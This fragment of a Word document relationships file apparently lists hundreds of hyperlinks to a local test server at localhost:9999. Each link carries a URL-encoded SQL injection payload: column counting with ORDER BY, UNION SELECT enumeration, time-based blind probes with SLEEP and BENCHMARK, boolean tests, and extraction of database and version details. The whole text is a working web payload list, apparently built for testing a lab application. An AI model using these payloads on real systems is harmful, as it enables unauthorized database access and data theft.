Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20AND%205650=CONVERT(INT,(UNION%20ALL%20SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)))--%20" TargetMode="External"/><Relationship Id="rId270" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2%23" TargetMode="External"/><Relationship Id="rId65" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20ORDER%20BY%2026--%20" TargetMode="External"/><Relationship Id="rId130" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20ORDER%20BY%2029%20" TargetMode="External"/><Relationship Id="rId368" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20SELECT%20@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13%23" TargetMode="External"/><Relationship Id="rId575" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%27%20AND%205584=5584%20AND%20%27fkel%27=%27fkel" TargetMode="External"/><Relationship Id="rId228" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--%20" TargetMode="External"/><Relationship Id="rId43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--%20" TargetMode="External"/><Relationship Id="rId281" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13%23" TargetMode="External"/><Relationship Id="rId502" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23" TargetMode="External"/><Relationship Id="rId76" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20ORDER%20BY%206%23%20" TargetMode="External"/><Relationship Id="rId141" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3AnD%20SLEEP(5)--" TargetMode="External"/><Relationship Id="rId379" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20SELECT%20@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24%23" TargetMode="External"/><Relationship Id="rId586" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20AND%201=1%20AND%20'%25'='" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20OR%201=0%23" TargetMode="External"/><Relationship Id="rId239" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201" TargetMode="External"/><Relationship Id="rId446" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20AND%205650=CONVERT(INT,(UNION%20ALL%20SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)))%23" TargetMode="External"/><Relationship Id="rId292" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24%23" TargetMode="External"/><Relationship Id="rId306" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8--%20" TargetMode="External"/><Relationship Id="rId87" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20ORDER%20BY%2017%23%20" TargetMode="External"/><Relationship Id="rId513" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4--%20" TargetMode="External"/><Relationship Id="rId597" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20and%20(select%20substring(@@version,2,1))='i'" TargetMode="External"/><Relationship Id="rId152" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7" TargetMode="External"/><Relationship Id="rId457" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20AND%205650=CONVERT(INT,(UNION%20ALL%20SELECTCHAR(88)))" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20HAVING%201=1" TargetMode="External"/><Relationship Id="rId56" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20ORDER%20BY%2017--%20" TargetMode="External"/><Relationship Id="rId317" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19--%20" TargetMode="External"/><Relationship Id="rId359" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20SELECT%20@@VERSION,SLEEP(5),USER(),4%23" TargetMode="External"/><Relationship Id="rId524" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15--%20" TargetMode="External"/><Relationship Id="rId566" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27%23" TargetMode="External"/><Relationship Id="rId98" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20ORDER%20BY%2028%23%20" TargetMode="External"/><Relationship Id="rId121" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20ORDER%20BY%2020%20" TargetMode="External"/><Relationship Id="rId163" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17" TargetMode="External"/><Relationship Id="rId219" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12--%20" TargetMode="External"/><Relationship Id="rId370" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20SELECT%20@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15%23" TargetMode="External"/><Relationship Id="rId426" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20AND%205650=CONVERT(INT,(UNION%20ALL%20SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)))--%20" TargetMode="External"/><Relationship Id="rId230" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22--%20" TargetMode="External"/><Relationship Id="rId46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" TargetMode="External"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20AND%201=0%23" TargetMode="External"/><Relationship Id="rId67" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20ORDER%20BY%2028--%20" TargetMode="External"/><Relationship Id="rId272" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4%23" TargetMode="External"/><Relationship Id="rId328" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30--%20" TargetMode="External"/><Relationship Id="rId535" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26--%20" TargetMode="External"/><Relationship Id="rId577" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id='%20AND%205584=5584%20AND%20'fkel'='fkel" TargetMode="External"/><Relationship Id="rId132" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20ORDER%20BY%2031337%20" TargetMode="External"/><Relationship Id="rId174" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28" TargetMode="External"/><Relationship Id="rId381" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20SELECT%20@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26%23" TargetMode="External"/><Relationship Id="rId602" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20RLIKE%20(SELECT%20(CASE%20WHEN%20(4346=4346)%20THEN%200x61646d696e%20ELSE%200x28%20END))%20AND%20'Txws'='" TargetMode="External"/><Relationship Id="rId241" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3" TargetMode="External"/><Relationship Id="rId437" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20AND%205650=CONVERT(INT,(UNION%20ALL%20SELECTCHAR(88)))%23" TargetMode="External"/><Relationship Id="rId479" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20CHAR(113)+CHAR(106)+CHAR(122)+CHAR(106)+CHAR(113)+CHAR(110)+CHAR(106)+CHAR(99)+CHAR(73)+CHAR(66)+CHAR(109)+CHAR(119)+CHAR(81)+CHAR(108)+CHAR(88)+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)+CHAR(113),NULL--%20" TargetMode="External"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20WHERE%201=1%20AND%201=1%23" TargetMode="External"/><Relationship Id="rId283" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15%23" TargetMode="External"/><Relationship Id="rId339" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20SELECT%20@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13" TargetMode="External"/><Relationship Id="rId490" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4,5,6,7,8,9,10,11" TargetMode="External"/><Relationship Id="rId504" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25" TargetMode="External"/><Relationship Id="rId546" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4,5,6,7%23" TargetMode="External"/><Relationship Id="rId78" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20ORDER%20BY%208%23%20" TargetMode="External"/><Relationship Id="rId101" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20ORDER%20BY%2031337%23" TargetMode="External"/><Relationship Id="rId143" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3&amp;&amp;SLEEP(5)" TargetMode="External"/><Relationship Id="rId185" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9%23" TargetMode="External"/><Relationship Id="rId350" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20SELECT%20@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24" TargetMode="External"/><Relationship Id="rId40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--%20" TargetMode="External"/><Relationship Id="rId588" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20AND%207506=9091%20AND%20('5913=5913" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20OR%20x=y%23" TargetMode="External"/><Relationship Id="rId210" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),3--%20" TargetMode="External"/><Relationship Id="rId392" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20@@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL--%20" TargetMode="External"/><Relationship Id="rId44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%23" TargetMode="External"/><Relationship Id="rId252" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14" TargetMode="External"/><Relationship Id="rId294" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26%23" TargetMode="External"/><Relationship Id="rId308" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10--%20" TargetMode="External"/><Relationship Id="rId515" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4,5,6--%20" TargetMode="External"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20ORDER%20BY%208--%20" TargetMode="External"/><Relationship Id="rId89" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20ORDER%20BY%2019%23%20" TargetMode="External"/><Relationship Id="rId112" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20ORDER%20BY%2011%20" TargetMode="External"/><Relationship Id="rId154" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9" TargetMode="External"/><Relationship Id="rId361" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20SELECT%20@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6%23" TargetMode="External"/><Relationship Id="rId557" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18%23" TargetMode="External"/><Relationship Id="rId599" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20and%20(select%20substring(@@version,1,1))='X'" TargetMode="External"/><Relationship Id="rId196" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19%23" TargetMode="External"/><Relationship Id="rId417" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20AND%205650=CONVERT(INT,(UNION%20ALL%20SELECTCHAR(88)))--%20" TargetMode="External"/><Relationship Id="rId459" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20AND%205650=CONVERT(INT,(UNION%20ALL%20SELECTCHAR(88)+CHAR(88)+CHAR(88)))" TargetMode="External"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20HAVING%201=1%23" TargetMode="External"/><Relationship Id="rId221" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14--%20" TargetMode="External"/><Relationship Id="rId263" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25" TargetMode="External"/><Relationship Id="rId319" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--%20" TargetMode="External"/><Relationship Id="rId47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" TargetMode="External"/><Relationship Id="rId526" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17--%20" TargetMode="External"/><Relationship Id="rId58" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20ORDER%20BY%2019--%20" TargetMode="External"/><Relationship Id="rId123" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20ORDER%20BY%2022%20" TargetMode="External"/><Relationship Id="rId330" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20SELECT%20@@VERSION,SLEEP(5),USER(),4" TargetMode="External"/><Relationship Id="rId568" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29%23" TargetMode="External"/><Relationship Id="rId165" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19" TargetMode="External"/><Relationship Id="rId372" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20SELECT%20@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17%23" TargetMode="External"/><Relationship Id="rId42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--%20" TargetMode="External"/><Relationship Id="rId232" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24--%20" TargetMode="External"/><Relationship Id="rId274" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4,5,6%23" TargetMode="External"/><Relationship Id="rId481" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2" TargetMode="External"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20AND%207506=9091%20AND%20(5913=5913" TargetMode="External"/><Relationship Id="rId69" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20ORDER%20BY%2030--%20" TargetMode="External"/><Relationship Id="rId134" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3IF(7423=7423)%20SELECT%207423%20ELSE%20DROP%20FUNCTION%20xcjl--" TargetMode="External"/><Relationship Id="rId537" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28--%20" TargetMode="External"/><Relationship Id="rId579" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%27%20UNION%20ALL%20SELECT%2067,CONCAT(0x0a,database(),0x0a),67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67,67--%20-" TargetMode="External"/><Relationship Id="rId80" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20ORDER%20BY%2010%23%20" TargetMode="External"/><Relationship Id="rId176" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30" TargetMode="External"/><Relationship Id="rId341" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20SELECT%20@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15" TargetMode="External"/><Relationship Id="rId383" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20SELECT%20@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28%23" TargetMode="External"/><Relationship Id="rId439" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20AND%205650=CONVERT(INT,(UNION%20ALL%20SELECTCHAR(88)+CHAR(88)+CHAR(88)))%23" TargetMode="External"/><Relationship Id="rId590" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3'%20AnD%20SLEEP(5)%20ANd%20'1" TargetMode="External"/><Relationship Id="rId201" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24%23" TargetMode="External"/><Relationship Id="rId243" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4,5" TargetMode="External"/><Relationship Id="rId285" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17%23" TargetMode="External"/><Relationship Id="rId45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%23" TargetMode="External"/><Relationship Id="rId506" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27" TargetMode="External"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20WHERE%201=1%20AND%201=1--" TargetMode="External"/><Relationship Id="rId103" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20ORDER%20BY%202%20" TargetMode="External"/><Relationship Id="rId310" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12--%20" TargetMode="External"/><Relationship Id="rId492" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4,5,6,7,8,9,10,11,12,13" TargetMode="External"/><Relationship Id="rId548" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4,5,6,7,8,9%23" TargetMode="External"/><Relationship Id="rId91" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20ORDER%20BY%2021%23%20" TargetMode="External"/><Relationship Id="rId145" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3&amp;&amp;SLEEP(5)%23" TargetMode="External"/><Relationship Id="rId187" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11%23" TargetMode="External"/><Relationship Id="rId352" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20SELECT%20@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26" TargetMode="External"/><Relationship Id="rId394" 